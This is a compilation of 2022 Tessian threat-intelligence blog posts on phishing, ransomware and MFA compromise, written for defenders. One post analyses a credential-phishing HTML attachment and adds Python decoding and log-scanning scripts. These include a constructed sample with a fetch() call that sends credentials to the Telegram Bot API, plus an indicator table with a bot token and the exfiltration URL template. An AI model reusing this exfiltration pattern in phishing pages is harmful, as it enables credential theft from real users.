
Threat Intel
2022 Tessian Threat Intel Roundup: Social Engineering Threats Are Here to Stay
by John Filitz Thursday, December 8th, 2022
As we close out the year, one thing is certain: social engineering attacks will remain a mainstay for threat actors. The ease with which threat actors are able to exploit human vulnerabilities will find even the most secure organizations wanting. This is why, according to Tessian’s inaugural State of Email Security Report (2022), impersonation attacks are the number 1 concern for organizations globally. Only by adopting a defense-in-depth strategy will organizations be able to reduce the risk of falling victim to social engineering-based attacks.

In this final newsletter for the year we take a look at some of the dominant themes we’ve covered in 2022.

Sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Top Threat Intel Themes Covered in 2022

1. Phishing-as-a-Service Goes Mainstream

Phishing remains a persistent threat and security challenge. Phishing-as-a-Service offerings continue to evolve and proliferate on the dark web, reducing barriers to entry and effectively creating whole new armies of threat actors. Threat actors continue having significant success using phishing and business email compromise (BEC) campaigns to compromise organizations. This helps explain why social engineering attacks in the form of phishing and BEC are the top two costliest forms of a breach, topping out at $4.91 million and $4.89 million, respectively.

2. Impersonation Campaigns Continue Evolving

Earlier in the year we started tracking an increase in 3rd party impersonation campaigns that were leveraging PayPal to carry out invoice fraud. Other impersonation campaigns that came across the wire included threat actors targeting the legal sector – a sector that is disproportionately targeted by social engineering attacks. We’ve also found that obfuscation is the name of the game for malicious payload delivery. The continued persistence of brand impersonation campaigns is also cause for concern. In fact, the FTC reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021. We expect these trends to continue, evidenced by record-breaking phishing activity in 2022, for the first time surpassing 1 million phishing attacks reported in a quarter.

3. The Unrelenting Scourge of Ransomware

One of the recurring themes we have been tracking is the nexus between ransomware and spear phishing attacks. Ransomware has proven to be a persistent security challenge with the rise of Ransomware-as-a-Service (RaaS) offerings. The increase in ransomware-related damages – a 57x increase since 2015 – is one of the main reasons driving up cyber insurance premiums, which have seen increases of over 100% in the past 18 months. We expect nation-state and non-aligned threat actors to continue relying on ransomware and related extortion tactics, with email a key threat vector for payload delivery.

4. The Rise, and Rise, of Credential Compromises

Another trend we have been closely following is the increasing prevalence of credential-related compromises. One such noteworthy adversary-in-the-middle (AiTM) compromise saw 10,000 organizations that use Microsoft targeted. Several large organizations have suffered credential-related compromises, shining a spotlight on the fallibility of identity and access management (IAM) solutions in the face of the threat that social engineering poses. Credential compromise social engineering campaigns that target organizations using Microsoft 365 and Google Workspace collaboration software will remain a core focus area for threat actors going forward.

5. Event Opportunism

As is so often the case, cyber criminals, the opportunists that they are, will attempt to exploit international and national events, including acts of war, pandemics and festive events. This reality was on full display at the start of the Russian invasion of Ukraine. We noted that over 70% of newly registered Ukraine-themed domains were likely to be malicious. We expected a ramp-up of Russian cyber campaign activity in the wake of the invasion; however, this has failed to materialize. Effective public-private partnerships, as demonstrated by Microsoft and others, are part of the reason for the unprecedented level of cyber resilience shown by Ukraine and allied countries.
Concluding Thoughts & Recommended Actions

Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of social-engineering-related breaches be reduced. Utilizing best-in-breed cybersecurity solutions that have behavioral intelligence-based defensive capabilities, and that reinforce security culture strengthening, like Tessian, is increasingly essential to address an ever-evolving social engineering threatscape.

Until next year, stay safe and stay secure.

To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel
“No Pain No Gain” Impersonation Campaign – Sending Stolen Credentials to Telegram Group
by Catalin Giana Thursday, November 10th, 2022
The Tessian Threat Intel team discovered a new Microsoft impersonation campaign in the wild called “No Pain No Gain.” The campaign utilizes a Telegram API call to harvest credentials to a malicious chat group on the messaging platform – a common tactic that was first identified last year. The threat actors also relied on heavily encoding the malicious attachment. Read further to see how we reviewed the attachment, and the steps we took to de-obfuscate it. We also show what the harvested credentials look like when received by the Telegram Bot API.

The victim receives an email with an HTML attachment called Setup Outlook-mail.html. Upon opening it, the victim is redirected to a page that impersonates Microsoft’s login, with the victim’s email address already embedded in the page.

[Figure: Impersonated Microsoft login page]

This is not especially impressive at this point: at face value it appears to be a run-of-the-mill impersonation campaign of a kind that has been seen before. Where it gets interesting is that, upon inspecting the HTML page, it is apparent that great effort was taken to obfuscate the code.

Decoding the HTML attachment

[Figure: Obfuscated code]

Step 1

The HTML page contains multiple layers of obfuscation that needed to be removed manually in order to reveal the original content. After unescaping all the JavaScript-encoded characters we were left with a more readable script.

[Figure: Code snippet before base64 decoding]

Step 2

In order to reveal the actual HTML we had to decode the string found in the data variable, which we found out was base64 encoded. After another step of decoding and beautifying, we found the readable HTML code.

[Figure: Decoded data variable]

Outcome

All the magic can be found in the code snippet above. What is unique about this campaign is that, instead of using a command and control server to store the stolen data, it uses the Telegram app, via the Telegram API, to deliver it to a malicious chat group on the messaging platform. The stolen information contains usernames and passwords that can be used to compromise Microsoft email accounts. The sent message also has the geolocation of the victim and the User-Agent that was used.
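The two decoding steps above (unescaping the JavaScript-encoded characters, then base64-decoding the data variable) can be scripted so an analyst can triage a suspect HTML attachment without opening it in a browser. The following is an added example written for this page, not the Tessian team's own tooling: the attachment it decodes is a constructed sample built inline to mimic the structure described (\uXXXX-escaped script, base64 in a data variable, a Telegram sendMessage URL inside), with placeholder bot token and chat id rather than the campaign's real values.

```python
import base64
import re
from typing import Optional, Dict
from urllib.parse import parse_qs

# --- Constructed sample (NOT the real campaign attachment) -------------------
# Inner page that the attacker-style wrapper would reveal after decoding.
# The bot token and chat_id are placeholders, not indicators from any campaign.
INNER_HTML = (
    '<form id="login"><input name="password"></form>'
    '<script>fetch("https://api.telegram.org/bot0000000000:PLACEHOLDER_TOKEN'
    '/sendMessage?chat_id=0000000000&text=" + encodeURIComponent(creds));</script>'
)

def _js_escape(text: str) -> str:
    """Render every character as a \\uXXXX escape (how the sample was obfuscated)."""
    return "".join(f"\\u{ord(c):04x}" for c in text)

# Wrapper script: the victim's address is embedded (as in the campaign), and the
# base64 of the inner page sits in a "data" variable, itself \u-escaped.
SAMPLE_ATTACHMENT = (
    "<script>var emai\\u006c=\"victim@example.com\";"
    "var data=\"" + _js_escape(base64.b64encode(INNER_HTML.encode()).decode()) + "\";"
    "document.write(atob(data));</script>"
)

# --- Decoding steps -----------------------------------------------------------
_JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")

def unescape_js(text: str) -> str:
    """Step 1: replace \\uXXXX and \\xXX JavaScript escapes with literal characters."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)

_DATA_VAR = re.compile(r"var\s+data\s*=\s*[\"']([A-Za-z0-9+/=]+)[\"']")

def decode_data_variable(script: str) -> str:
    """Step 2: locate the base64 'data' variable and decode it to the inner HTML."""
    m = _DATA_VAR.search(script)
    if not m:
        raise ValueError("no base64 'data' variable found after unescaping")
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")

_TELEGRAM_URL = re.compile(
    r"https://api\.telegram\.org/bot([0-9]+:[A-Za-z0-9_-]+)/sendMessage\?([^\"' ]*)"
)

def extract_telegram_exfil(html: str) -> Optional[Dict[str, Optional[str]]]:
    """Report the bot token and chat_id of any Telegram sendMessage URL in the page."""
    m = _TELEGRAM_URL.search(html)
    if not m:
        return None
    params = parse_qs(m.group(2))
    return {"bot_token": m.group(1), "chat_id": params.get("chat_id", [None])[0]}

def analyse_attachment(attachment: str) -> Dict[str, object]:
    """Run both decoding steps and summarise what the page would exfiltrate, and where."""
    readable = unescape_js(attachment)
    inner = decode_data_variable(readable)
    email = re.search(r'var email="([^"]+)"', readable)
    return {
        "embedded_email": email.group(1) if email else None,
        "exfil": extract_telegram_exfil(inner),
    }

if __name__ == "__main__":
    print(analyse_attachment(SAMPLE_ATTACHMENT))
```

Real samples vary the escaping (hex escapes, String.fromCharCode chains, several nested base64 layers), so in practice the two steps are applied repeatedly until no further decodable layer remains; the bot token and chat_id surfaced at the end are what goes into the indicator table and the mail-gateway block list.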
Telegram testing with our own channel

We created a Telegram chat group for testing purposes to see exactly how the stolen data, i.e. the credentials, are harvested and sent out via the Telegram API (see graphic below). Using an impersonated Microsoft login page, the threat actors prompt the victim for a password; this triggers a pop-up message indicating that the first password entered is incorrect or too short. The victim is then prompted to submit a second password, which then appears to be a successful login. In addition to harvesting the credentials, other collected data includes the victim’s IP address, obtained using the ip-api.com service. All the stolen data is stored in the malicious Telegram chat group in the format below.

[Figure: Example of harvested credentials message]

When we used the getChat endpoint, we received the response below from the malicious Telegram group chat. We were able to identify the group ID and the group name, and to determine that the channel is private.

[Figure: Group ID]

We were also able to determine that the malicious Telegram group chat has two members.

[Figure: Group Members]

After further investigation we were unable to access the contents of the Telegram chat group due to privacy and security settings set by the threat actors. We based this determination on the fact that the value of the parameter “can_read_all_group_messages” is set to “False”.

[Figure: Privacy Settings]
Indicators

Here is a table of indicators that can be filtered or searched on in your logs for any potential past leaks, or signals for any attempts.

Object: Indicator
Telegram Bot ID: 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk
Telegram Channel ID: 5748272550
Email Attachment Filename [T1598.002]: Setup Outlook-mail.htm, Setup Outlook-mail.html
Starting Text: <script>var emai\u006c=”
Telegram API Exfiltration [T1071.001]: https://api[.]telegram[.]org/bot$botid_value/sendMessage?chat_id=$channel&text=$credentials

$botid_value = the value that Telegram BotFather provides for the bot (5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk)
$channel = the value of the channel at Telegram (5748272550)
$credentials = the data that is being sent to Telegram and the fraud channel hosted there
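The indicators above are most useful when turned into a search over proxy and mail-gateway logs: any sendMessage call to the Telegram Bot API from a workstation is worth a look, and one carrying the listed bot ID or channel ID is a confirmed hit. The script below is an added example written for this page (not Tessian's detection logic); the log lines it scans are constructed samples in an assumed key=value format, and the bot token in them is shown redacted, with only the bot ID and channel ID taken from the table.

```python
import re
from typing import Dict, List, Tuple

# Indicators from the table above (bot ID is the numeric part before the colon).
TELEGRAM_BOT_ID = "5695672431"
TELEGRAM_CHANNEL_ID = "5748272550"
ATTACHMENT_NAMES = {"setup outlook-mail.htm", "setup outlook-mail.html"}

# Constructed sample log lines in an assumed key=value layout; not real telemetry.
SAMPLE_LOGS = [
    '2022-11-08T09:13:55Z mailgw from=billing@example.net to=jdoe@example.com '
    'attachment="Setup Outlook-mail.html" verdict=delivered',
    '2022-11-08T09:14:02Z proxy host=ws-017 user=jdoe dst=api.telegram.org '
    'path="/bot5695672431:REDACTED_TOKEN/sendMessage?chat_id=5748272550&text=..." status=200',
    '2022-11-08T10:02:41Z proxy host=ws-022 user=asmith dst=api.telegram.org '
    'path="/bot1111111111:OTHER_TOKEN/sendMessage?chat_id=1234567890&text=hi" status=200',
    '2022-11-08T10:05:12Z mailgw from=hr@example.com to=asmith@example.com '
    'attachment="Q4 Plan.pdf" verdict=delivered',
]

# Matches a Bot API sendMessage call and captures the numeric bot ID and the query string.
TELEGRAM_SEND = re.compile(
    r"api\.telegram\.org.*?/bot(?P<bot>\d+):[^/\"]+/sendMessage\?(?P<query>[^\"\s]*)"
)
ATTACHMENT = re.compile(r'attachment="(?P<name>[^"]+)"')

def _chat_id(query: str) -> str:
    """Pull chat_id out of a raw query string without decoding the rest of it."""
    params = dict(p.split("=", 1) for p in query.split("&") if "=" in p)
    return params.get("chat_id", "")

def scan_line(line: str) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for one log line; empty list if clean."""
    findings: List[Tuple[str, str]] = []
    m = TELEGRAM_SEND.search(line)
    if m:
        bot, chat = m.group("bot"), _chat_id(m.group("query"))
        if bot == TELEGRAM_BOT_ID or chat == TELEGRAM_CHANNEL_ID:
            findings.append(("high", f"known campaign Telegram bot/channel (bot {bot}, chat {chat})"))
        else:
            # Any Bot API sendMessage from an endpoint is unusual enough to review.
            findings.append(("medium", f"Telegram sendMessage from endpoint (bot {bot}, chat {chat})"))
    a = ATTACHMENT.search(line)
    if a and a.group("name").lower() in ATTACHMENT_NAMES:
        findings.append(("high", f"attachment name matches campaign indicator: {a.group('name')}"))
    return findings

def scan_logs(lines: List[str]) -> Dict[int, List[Tuple[str, str]]]:
    """Scan every line and keep only those with findings, keyed by line index."""
    return {i: f for i, line in enumerate(lines) if (f := scan_line(line))}

if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS).items():
        for severity, msg in hits:
            print(f"line {idx}: [{severity}] {msg}")
```

Correlating the two high findings on the same user (the attachment delivered at 09:13, the Telegram call from that user's workstation at 09:14) is what turns an indicator match into an account-compromise case: the credential reset and session revocation should follow from the proxy hit, not wait for a user report.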
Conclusions and Recommendations

• Don’t open attachments from unknown sources, especially if you weren’t expecting an Invoice/Outlook Setup/Resume etc. If you opened an attachment and you are still unsure, please send it to your security team for review.
• Ensure that your organization utilizes an intelligent email security solution that can prevent and detect advanced impersonation campaigns.
• If you have security experience, you can open the HTML page in a text editor before running it; if it’s highly obfuscated, as in the first screenshot above, there is a high possibility that it is malicious.

Additionally, the US Cybersecurity and Infrastructure Security Agency (CISA) offers useful advice for staying safe as well as a list of free cybersecurity tools. The UK’s National Cyber Security Centre (NCSC) also offers useful guidance for staying safe.
Threat Intel, ATO/BEC
Tessian Threat Intel Roundup: Advanced Phishing Attacks
by John Filitz Monday, October 31st, 2022
On the back of Cybersecurity Awareness Month in October 2022, with its key recommendations to protect against phishing attacks, we delve deeper into the latest Phishing-as-a-Service offering known as Caffeine, first identified by Mandiant. We also unpack an impersonation campaign we identified in the wild called Logokit. And in other notable news, a misconfigured Microsoft endpoint storage vulnerability dubbed BlueBleed was exposed by researchers at SOCRadar, potentially exposing sensitive data for thousands of customers.

• Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web.
• The commercialization of these PhaaS exploit kits and threat actors’ services is removing the barriers to entry for carrying out attacks at scale.
• The most recent offering is the so-called Caffeine PhaaS exploit kit, which enables anyone to procure the kit and launch phishing attacks against Microsoft 365 targets.
• Tessian Threat Intel recently identified a Business Email Compromise (BEC) campaign in the wild called Logokit.
• Logokit uses randomized spoofed pages and brand logos for the purpose of harvesting login credentials. In one instance we found that a spoofed version of a Microsoft login page was being used in an attempt to capture credentials.
• Researchers from SOCRadar identified six misconfigured Azure buckets, which they have dubbed BlueBleed.
• The BlueBleed exposure, according to SOCRadar, is among the most significant B2B leaks ever, exposing sensitive data of 65,000 entities across 111 countries.
• Microsoft immediately rectified the privacy settings on the exposed buckets, thanking SOCRadar, while disputing the extent of the exposure.

Phishing remains a persistent threat and security challenge. Threat actors continue having significant success using social engineering attacks to compromise organizations. And there is no silver bullet to protect against social engineering attacks.

Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of a social-engineering-related breach be reduced. Utilizing a best-in-breed solution that has advanced social engineering defense capabilities and that reinforces security culture strengthening, like Tessian, is increasingly essential to address an ever-evolving threatscape.
Threat Intel
A day in the life of Tessian’s Threat Hunters
by Andrew Webb Thursday, October 13th, 2022
Our head of Threat Intelligence, Paul Laudanski, takes us through a typical threat hunting exercise and takes up the story…

Threat hunting is the act of looking for the unknown; for an attack vector we don’t know anything about, for a new campaign, or changes to tactics, techniques and procedures. And there are always new types of attacks to contend with. When I find one type of threat, oftentimes that can snowball into finding other types of threats, so I keep hunting and pivoting and enriching the information that I find. Here’s a recent example…

At Tessian, we’re interested in attacks delivered via email and so I started off with a query looking for URL duplicates that have been sent in emails at least five times during September. I’m specifically targeting the “low and slow” type of attack, where the offenders do not want to alarm security tools and teams. They might be targeting a certain type of function or role for instance.

Breaking this SQL query down, I search for URLs and the email subjects they are associated with, and how many times they were seen. I don’t want to see singletons, but my gut tells me I don’t want to see anything less than 3 hits. Will I search for those as well? Yes, that is another type of search I run in another stream. But for now, my interest is in 5 or more hits.

This approach revealed some interesting recurring URL path and filename values. This match, k7OIMyJhEU/page1.php after the domain, was seen hundreds of times across many domains and their subdomains. Very much a low type of attack because it was spread across different domains. Tools don’t normally pick up on this type of occurrence, and it takes an intel analyst to find such behavior. There were several full URLs with that exact pattern, and as I sampled some, Chrome was telling me they were bad. But I couldn’t get the ones I was sampling to actually load anything. So I updated my query to this:
This query now focuses on giving me all the URLs that match that directory pattern, because I want to see what this actually is. Here is a sample, with a subject containing Visa or Mastercard in it. We know from Chrome that some of these that I sampled are malicious.
The subject is detected by Google Translate as Japanese. Taking a sample subject from the above, I’m advised it translates to: “Visa card information on estimated payment amount”. Now I continue to pivot, and take a domain for further analysis: anl7ya[.]icu.   An open source investigation into said domain showed it is heavily involved in phishing and malware activity. Researching Passive DNS data for that domain, there are 191 records. Many of the subdomains were first seen on the 14th of September. None of this is good based on the threat signals around the domain and its activity.   The IP address associated with the domain, searching spam deny listed services reveals UCEPROTECT and Barracuda have it listed as being involved in spam campaigns.
So I started off with JST with an open mind and a theory, hunting and pivoting, trying to see what I could find. I found something for sure, and then started to enrich and dive deeper and go broader. Doing so gave me a lot more information we can use to build our own threat intel. This is called derivative data, and it helps to spot the attacks on a broader scale; otherwise we might miss additional attack vectors.

Ultimately, in my open source queries I found a snapshot reported by a Twitter user:

As a threat intelligence team, we work hard to ensure customers are protected against this and other types of behavior by leaning in and being engaged with the intelligence. We want to focus on what is called the Pyramid of Pain. Here we have indicators we can use to detect and protect against, and we can also move up the pyramid and look at the patterns: in this case, it doesn’t matter what the domain is; so long as we see “k7OIMyJhEU/page1.php”, we can detect it and look to protect against it. Hence our coverage is broad, and we add another query into our playbook that we can automate and spot any changes or new patterns of threats.

This is fun and exciting work. I enjoy working with the unknown and making actionable sense of intelligence. If you’d like to join me, check out our open roles here.
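The hunt described in this post (group URLs seen at least five times by the path tail after the domain, then look for tails that recur across many unrelated hosts) is easy to reproduce in code once the email URL table has been exported. The script below is an added example written for this page, not Tessian's query or playbook; the rows it runs over are constructed (url, subject) pairs on reserved .test domains, and the only detail borrowed from the post is the k7OIMyJhEU/page1.php path pattern itself.

```python
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed rows as they might come out of an email URL table: (url, subject).
# Domains are reserved .test names; only the path pattern comes from the post.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("http://a.example-one.test/k7OIMyJhEU/page1.php", "Visa card information on estimated payment amount"),
    ("http://b.example-one.test/k7OIMyJhEU/page1.php", "Visa card information on estimated payment amount"),
    ("http://example-two.test/k7OIMyJhEU/page1.php", "Mastercard payment notice"),
    ("http://mail.example-three.test/k7OIMyJhEU/page1.php", "Mastercard payment notice"),
    ("http://example-four.test/k7OIMyJhEU/page1.php?id=7", "Visa card information on estimated payment amount"),
    ("http://example-five.test/k7OIMyJhEU/page1.php", "Visa card information on estimated payment amount"),
    ("http://news.example-six.test/track/open.php", "Weekly newsletter"),
    ("http://news.example-six.test/track/open.php", "Weekly newsletter"),
    ("http://news.example-six.test/track/open.php", "Weekly newsletter"),
    ("http://news.example-six.test/track/open.php", "Weekly newsletter"),
    ("http://news.example-six.test/track/open.php", "Weekly newsletter"),
    ("http://example-seven.test/invoice/123.pdf", "Your invoice"),
]

def path_tail(url: str, segments: int = 2) -> str:
    """The last N path segments after the domain, ignoring the query string."""
    parts = [p for p in urlparse(url).path.split("/") if p]
    return "/".join(parts[-segments:])

def rank_patterns(rows: List[Tuple[str, str]], min_hits: int = 5) -> List[Dict[str, object]]:
    """Group URLs by path tail, keep tails seen >= min_hits times, and rank them by
    how many distinct hosts carry them: a tail spread across many unrelated hosts
    is the "low and slow" shape the post describes, whereas the same tail on a
    single host is usually just a busy legitimate sender."""
    hits: Dict[str, int] = defaultdict(int)
    hosts: Dict[str, set] = defaultdict(set)
    subjects: Dict[str, set] = defaultdict(set)
    for url, subject in rows:
        tail = path_tail(url)
        hits[tail] += 1
        hosts[tail].add(urlparse(url).hostname or "")
        subjects[tail].add(subject)
    ranked = [
        {"pattern": t, "hits": n, "distinct_hosts": len(hosts[t]),
         "hosts": sorted(hosts[t]), "subjects": sorted(subjects[t])}
        for t, n in hits.items() if n >= min_hits
    ]
    ranked.sort(key=lambda r: (r["distinct_hosts"], r["hits"]), reverse=True)
    return ranked

if __name__ == "__main__":
    for row in rank_patterns(SAMPLE_ROWS):
        print(f"{row['pattern']}: {row['hits']} hits across {row['distinct_hosts']} hosts; "
              f"subjects: {row['subjects']}")
```

The resulting pattern string is the detection the post ends with: a match on the path tail regardless of domain sits higher on the Pyramid of Pain than a block on any one of the throwaway hosts, because the attacker has to change the kit rather than register another domain.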
Threat Intel
New Impersonation Campaign: Logokit
by Catalin Giana Friday, September 30th, 2022
In August Tessian’s Threat Intel team saw a new Business Email Compromise malware campaign in the wild called Logokit. Logokit is an impersonation attack phishing kit used to propagate Business Email Compromise campaigns to harvest credentials.

How Logokit exploit kits work

Threat actors impersonate domains of trusted brands, commonly impersonating healthcare, financial or legal services providers. The phishing email usually contains a malicious URL or attachment. The unsuspecting victim clicks on the malicious URL, which in this case redirects to an impersonated Microsoft website. There, the threat actors attempt to harvest login credentials.

The attack chain

1. The law firm is impersonated and a spoofed account is used to send a malicious email to the victim.
2. The victim receives the malicious email and downloads the malicious HTML attachment.
3. Upon execution of the HTML page, the final landing page is a Microsoft impersonation page, requesting the victim to enter Microsoft login credentials.
4. The compromised credentials that were entered by the victim are then harvested by the threat actor.

Threat analysis

In the case that Tessian Threat Intel analyzed, a victim of this campaign was targeted by threat actors impersonating a law firm. The impersonated email from the law firm contained the company logo, as well as an obfuscated HTML attachment titled: Letter To Buyer’s Solicitor Enclosing Contract Bundle.htm

Tessian Threat Intel started the investigation in a virtual environment, analyzing the attached HTML file. At first inspection the HTML file appeared benign. We then analyzed the HTML file in a non-virtual environment. This initial HTML file then redirects to an impersonated Microsoft login webpage.

Conclusion and recommendations for staying safe

At the initial time of analysis, the Logokit redirect campaign stopped at the Microsoft phishing landing page. There is a high probability that this campaign could be altered in the coming days and weeks, landing on a different page.

In order to not fall victim to similar types of phishing emails we recommend:

• Being careful of unsolicited emails, especially those containing attachments or URLs. Before interacting with any suspicious email received, check the source and email header to confirm the organization it originated from is legitimate. If anything seems unusual, do not follow or click on links, or download attachments.
• If the suspicious email appears to come from someone you know and trust, like a colleague, reach out to the individual directly by phone, Slack, or a separate email thread. Rest assured, it’s better to confirm and proceed confidently than the alternative.
• Adopt intelligent cloud email security solutions like Tessian that use behavioral intelligence to detect and prevent advanced email attacks, including increasingly sophisticated impersonation emails.
Threat Intel
Tessian Threat Intel Roundup: Ransomware Dominates
by John Filitz Wednesday, September 28th, 2022
As we wind down Q3, we see no letting up by threat actors, with a series of high-profile breaches dominating the headlines in September. Of concern is the increasing activity of Ransomware-as-a-Service (RaaS) offerings and threat actor activity. It’s little surprise that phishing and email remain significant threat vectors for ransomware actors, either to gain initial access or to execute ransomware payloads.

Key Takeaways

• Phishing attacks are in uncharted territory with over 1 million attacks reported for Q2 2022. Financial services and SaaS companies are among the most targeted.
• Phishing and email remain primary threat vectors for gaining initial access to carry out ransomware attacks.
• Ransomware-as-a-Service (RaaS) gang activity continues its steady increase, up 63% in Q1 2022, as RaaS actors continue to diversify services and exploit kits, including mining exposed data to carry out second-stage Business Email Compromise (BEC) campaigns.
• There is significant concern that corrupting files will become a new modus operandi of Noberus aka BlackCat ransomware actors and affiliates, in place of the usual encrypting of files.
• LockBit ransomware encryption code has been leaked, sparking concern about an increase in LockBit attacks.
• Ukraine has proven to be cyber resilient against Russian cyber attacks, largely as a result of recovering from previous significant breaches such as NotPetya, and as a result of NATO support.
• Recent reports of an Iranian cyber campaign against Albania have resulted in the severing of diplomatic ties with Iran.
• The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a record number of advisories for the month, with ransomware and nation-state activity from Iran front-and-center.
Trending Analysis

Phishing attacks continue their upward trajectory according to the latest from APWG’s Q2 Phishing Activity Trends Report – with over 1 million phishing attacks recorded for the 2nd quarter of 2022 – the worst quarter on record. The most targeted industries according to APWG include financial services (28%), followed by webmail and Software-as-a-Service providers (19%) and retail (15%). Some of the key threat vectors identified by APWG are email-delivered impersonation and ransomware attacks.

New Zealand’s Computer Emergency Response Team (CERT NZ) reports that phishing campaigns are the primary method for threat actors to gain initial access to carry out ransomware attacks. Email, according to CERT NZ, is the third most commonly used vector for malware delivery.

Trend Micro reports a 63% rise in Ransomware-as-a-Service (RaaS) groups in the first quarter of 2022. Accenture reports on a growing trend of threat actors leveraging “sensitive corporate data exposed on the dark web” to carry out sophisticated Business Email Compromise (BEC) campaigns.

Findings from a Stairwell study indicate that RaaS affiliates of Noberus, also known as BlackCat/ALPHV, the successor to the DarkSide and BlackMatter ransomware gangs, are potentially resorting to corrupting files on local systems instead of encrypting them, with the release of a new “Exmatter” tool. BleepingComputer, citing research from Symantec on the “Exmatter” tool, shows that the new data extraction tool has been reengineered to more stealthily gain a foothold and exfiltrate data from compromised systems – an essential complement for carrying out double-extortion attacks. Symantec researchers also confirm the ability of Exmatter to “corrupt processed files.” The Record reports that leaked LockBit ransomware code has the ability to enable more widespread use of the ransomware file encryptor.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory on Vice Society ransomware actors that are targeting the education sector. The Los Angeles Unified School District, the second largest school district in the country, was the latest victim to suffer a Vice Society ransomware attack, which resulted in the loss of access to 500GB of data. CISA and MS-ISAC also released a ransomware guide, and CISA issued an RFI for new cybersecurity incident reporting under the proposed Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA). The proposed cyber compliance requirements will compel companies to report significant cybersecurity incidents within 72 hours, and within 24 hours after a ransomware payment has been made.

Turning attention to nation-states, Ukraine has proven to be relatively cyber resilient in the ongoing conflict with Russia, in large part due to recovery from previous cyber attacks such as the infamous NotPetya attack in 2017. The significant support received from NATO is another decisive factor. It is suspected that Ukrainian-affiliated cyber actors hacked Russia’s Wagner Group, responsible for mercenary recruitment for the Russian armed forces – compromising the personal data of mercenaries. CISA shows that Iranian nation-state actors gained access to the Government of Albania’s network 14 months prior to launching a devastating ransomware and wiper malware attack on that country in July. Albania has since severed diplomatic relations with Iran as it tries to recover data and restore public service operations.
Concluding Thoughts & Recommended Actions

The data point to an increasing threat of ransomware-related breaches in the short-to-medium term. Key industry verticals receive a disproportionate share of attacks, including financial services, technology, and more recently the education sector. The threat of nation-state-sponsored attacks, as witnessed recently in Albania, is of growing concern. Increasing geopolitical tension and instability are likely to raise the probability of state-sponsored ransomware campaigns disrupting key public services.

As the ransomware threat grows, adopting a defense-in-depth strategy is essential. One key attribute of hardening your information system against ransomware attacks is leveraging a machine learning, behavioral-based cybersecurity solution like Tessian that can detect anomalous behavior on email as it arises.
Threat Intel
Tessian Threat Intel
by John Filitz Tuesday, August 30th, 2022
A growing incidence of multi factor authentication (MFA) compromises is dominating the threatscape.    The recent breaches at Cisco and Twilio were part of a large phishing campaign that resulted in close to 10,000 credentials at 130 organizations being compromised. Another noteworthy MFA attack was the recent adversary-in-the-middle (AiTM) compromise at Microsoft, impacting over 10,000 organizations. We’re also tracking the persistent and growing challenges posed by ransomware and nation-state campaigns.   Sign-up for our Threat Intel update to get this monthly update straight to your inbox.    
  The use of MFA is an essential security control but has been over-hyped as providing fail-safe protection.   Social engineering using phishing for credential theft is central to recent MFA compromises.   Phishing attacks are escalating month over month to record highs.   MFA bypass attacks targeting organizations that use Microsoft 365 are on the rise.   ATO attacks are increasing and disproportionately targeting the financial sector.   Ransomware attacks are increasing and are targeting the industrial sector.   The threat posed by nation-state cyber campaigns is expected to persist and increase as geopolitical tensions escalate.
  The cost of a data breach is now $4.35m per incident. For healthcare that figure rises to $10.1m.   Phishing attacks are the costliest form of a breach coming in at $4.91m.   ATO attacks have increased by 307% in the last 2 years, with ATO related losses increasing by 90% in 2021 alone.   Phishing attacks escalated to over 1 million attacks in Q1 2022 – a new record.   Credential theft campaigns that resulted in the Cisco and Twilio breaches are part of a  phishing campaign that made use of what has been dubbed the “oktapus phishing kit.” This phishing campaign netted the Okta login credentials of almost 10k users at 130 organizations – mostly located in the US. Victims were targeted with a SMS phishing campaign linked to a malicious site that captured Okta login credentials and 2FA codes. The credentials were then used to gain access to the corporate networks of the affected companies via VPNs and remote devices.   The recent Microsoft 365 MFA related compromises were, according to Microsoft, attributed to the theft of a significant amount of login-in credentials through a large-scale phishing campaign. Using the compromised credentials, threat actors were able to hijack users’ already authenticated sign-in sessions. The threat actors were then able to access victims’ mailboxes and carry-out business email compromise campaigns against other targets.    According to Mitiga, the vulnerability inherent in Microsoft’s MFA authentication protocol is at the heart of the compromise. In particular, the lack of regular re-authentication prompts for a user’s session, even when a user is provisioning applications of a sensitive security nature, such as registering a second authenticator application in their Microsoft profile, played a big role in enabling escalation of the compromise.    
This weakness is further demonstrated in the Privilege Identity Management feature of Microsoft’s MFA, enabling admin users to request admin privileges through the PIM  feature only when needed. However Microsoft does not prompt users to reauthenticate for this privilege escalation on the basis that their existing session has already been authenticated. Compounding these vulnerabilities is the fact that there is no-way for customers of Microsoft 365 to override the MFA native features and request additional reauthentication prompts.   According to NCC Group, ransomware attacks are up 47% compared to a month earlier, with the top 3 targeted industry verticals industrials (32%), consumers cyclicals (17%), and technology (14%).    Lockbit 3.0 and Hiveleaks and BlackBasta are the top 3 trending ransomware groups, with Lazarus Group activity also increasing.   The threat of nation-state cyber campaigns is growing according to CSIS, with 86% of organizations indicating that they have been recently targeted on behalf of a nation-state.
The recent MFA compromise breaches indicate the limitations of relying on this single security control, and are resulting in an increasing number of successful ATO attacks.
As threat actors become more sophisticated, adopting a defense-in-depth strategy is essential. One key attribute of hardening your information system against ATO attacks is leveraging machine learning powered, behavioral-based cybersecurity like Tessian that is able to detect anomalous behavior as it arises, including after an attacker has already bypassed security controls such as MFA.
